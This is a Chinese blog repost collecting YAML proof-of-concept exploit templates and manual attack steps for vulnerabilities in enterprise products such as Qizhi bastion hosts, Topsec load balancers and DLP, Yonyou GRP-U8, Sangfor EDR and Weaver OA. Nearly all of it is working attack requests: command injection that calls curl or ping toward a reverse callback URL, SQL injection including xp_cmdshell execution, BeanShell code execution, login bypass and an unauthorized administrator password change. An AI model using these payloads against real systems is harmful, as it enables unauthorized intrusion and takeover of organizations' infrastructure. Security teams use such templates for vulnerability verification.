热门标签
热门文章
- 1java学习笔记:集合之一些练习题_java map
- 2图像分割与GAN网络_gan图像分割
- 3openmv串口发送数据_OpenMV串口发送图片
- 4删除数据库的外键_删除外键
- 5echarts树图的节点自定义图片,以及子节点挤在一起该怎么处理..._echarts树状图设置点的图形
- 6【超详细】HIVE 日期函数(当前日期、时间戳转换、前一天日期等)_hive當前時間
- 7Nginx详解(一篇让你深入认识Nginx)_ngix
- 8tryhackme
- 9穿越 java | 快速入门篇 - 第1节 计算机基础知识_java 开发涉及精简指令复杂指令
- 10如何在Wpf程序中使用MaterialDesign,实现mvvm,及封装常用的确认对话框、信息输入对话框、进度等待框_wpf material design
当前位置: article > 正文
HW漏洞集合(一)-yaml版_cnvd-2019-20835
作者:花生_TL007 | 2024-04-11 03:16:41
赞
踩
cnvd-2019-20835
HW漏洞集合(一)-yaml版
link:2020护网中的漏洞复现
1.齐治堡垒机前远程命令执行漏洞(CNVD-2019-20835)
name: poc-yaml-qzblj-java-CNVD-2019-20835 set: reverse: newReverse() reverseURL: reverse.url rules: - method: POST path: /shterm/listener/tui_update.php body: | ["t';import os;os.popen('curl+{{reverseURL}}')#"] expression: | reverse.wait(5) detail: author: HWHXY links: - https://my.oschina.net/u/4322686/blog/3448771
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
2.天融信TopApp-LB 负载均衡系统Sql注入漏洞
name: poc-yaml-trx-TopApp-sqli set: r1: randomInt(40000, 44800) r2: randomInt(40000, 44800) rules: - method: POST path: >- /acc/clsf/report/datasource.php body: >- t=l&e=0&s=t&l=1&vid=1+union select 1,2,3,4,5,6,7,8,9,md5(666),11,12,13,14,15,16,17,18,19,20,21,22--+&gid=0&lmt=10&o=r_Speed&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=@。。 expression: | response.status == 200 && response.body.bcontains(b"fae0b27c451c728867a567e8c1bb4e53") detail: author: MaxSecurity(https://github.com/MaxSecurity) links: - https://www.weaver.com.cn/
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
2.1 天融信TopApp-LB 负载均衡系统rce漏洞
name: poc-yaml-trx-TopAPP-rce set: reverse: newReverse() reverseURL: reverse.url rules: - method: POST path: /login_check.php headers: Content-Type: application/x-www-form-urlencoded body: >- userName=; ping {{reverseURL}}; echo&password=1&x=29&x=16 follow_redirects: true expression: | response.status == 200 && reverse.wait(5) detail: author: HWHXY links: - https://blog.csdn.net/Adminxe/article/details/108744908
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
3.用友GRP-u8 注入
name: poc-yaml-yonyou-grp-u8-sqli-to-rce set: r1: randomInt(1000, 9999) r2: randomInt(1000, 9999) rules: - method: POST path: /Proxy follow_redirects: false body: | cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'set/A {{r1}}*{{r2}}'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET> expression: | response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) detail: author: MrP01ntSun(https://github.com/MrPointSun) links: - https://www.hackbug.net/archives/111.html
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
4.绿盟UTS绕过登录
随便输密码->修改返回包为True->放行->等待第二次拦截包->内含管理员MD5->替换MD5登录,直接请求接口:/webapi/v1/system/accountmanage/account
5.天融信数据防泄漏系统越权修改管理员密码
POST /?module=auth_user&action=mod_edit_pwd
HOST:xxxxxxxxxxxxx
Cookie: username=superman;
uid=1&pd=Newpasswd&mod_pwd=1&dlp_perm=1
- 1
- 2
- 3
- 4
- 5
6. SANGFOR终端检测响应平台-任意用户登录
name: poc-yaml-sangfor-edr-arbitrary-admin-login
rules:
- method: GET
path: /ui/login.php?user=admin
follow_redirects: false
expression: >
response.status == 302 &&
response.body.bcontains(b"/download/edr_installer_") &&
response.headers["Set-Cookie"] != ""
detail:
author: hilson
links:
- https://mp.weixin.qq.com/s/6aUrXcnab_EScoc0-6OKfA
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
7. 深信服EDR rce1漏洞
name: poc-yaml-sangfor-edr-tool-rce
set:
r1: randomLowercase(8)
r2: randomLowercase(8)
rules:
- method: GET
path: "/tool/log/c.php?strip_slashes=printf&host={{r1}}%25%25{{r2}}"
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(bytes(r1 + "%" + r2))
detail:
author: cookie
links:
- https://edr.sangfor.com.cn/
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
8.深信服EDR rce2漏洞
name: poc-yaml-sangfor-edr-rce set: reverse: newReverse() reverseURL: reverse.url rules: - method: POST path: "/api/edr/sanforinter/v2/cssp/slog_client?token=e21kNTp0cnVlfQ==" follow_redirects: false body: | {"params":"w=123\"'1234123'\"|ping {{reverse.url}}"} expression: | response.status == 200 && reverse.wait(5) detail: author: HWHXY links: - https://edr.sangfor.com.cn/
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
9.泛微OA Bsh 远程代码执行漏洞(CNVD-2019-32204)
name: poc-yaml-ecology-javabeanshell-rce set: r1: randomInt(40000, 44800) r2: randomInt(40000, 44800) rules: - method: POST path: /weaver/bsh.servlet.BshServlet body: >- bsh.script=print%28{{r1}}*{{r2}}%29&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw follow_redirects: false expression: | response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) detail: author: l1nk3r links: - https://www.weaver.com.cn/cs/securityDownload.asp
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
10.泛微OA WorkflowCenterTreeData接口注入漏洞
name: poc-yaml-ecology-workflowcentertreedata-sqli set: r1: randomInt(4000, 9999) r2: randomInt(800, 1000) rules: - method: POST path: /mobile/browser/WorkflowCenterTreeData.jsp headers: Content-Type: application/x-www-form-urlencoded body: >- node=wftype_1132232323231&scope=23332323&formids=1111111111111%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a)))union+select+1024,({{r1}}*{{r2}})+order+by+(((1 follow_redirects: true expression: | response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) detail: author: JingLing(https://hackfun.org/) links: - https://anonfiles.com/A4cede8an1/_OA_WorkflowCenterTreeData_oracle_html - https://mp.weixin.qq.com/s/9mpvppx3F-nTQYoPdY2r3w
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/花生_TL007/article/detail/402611
推荐阅读
相关标签
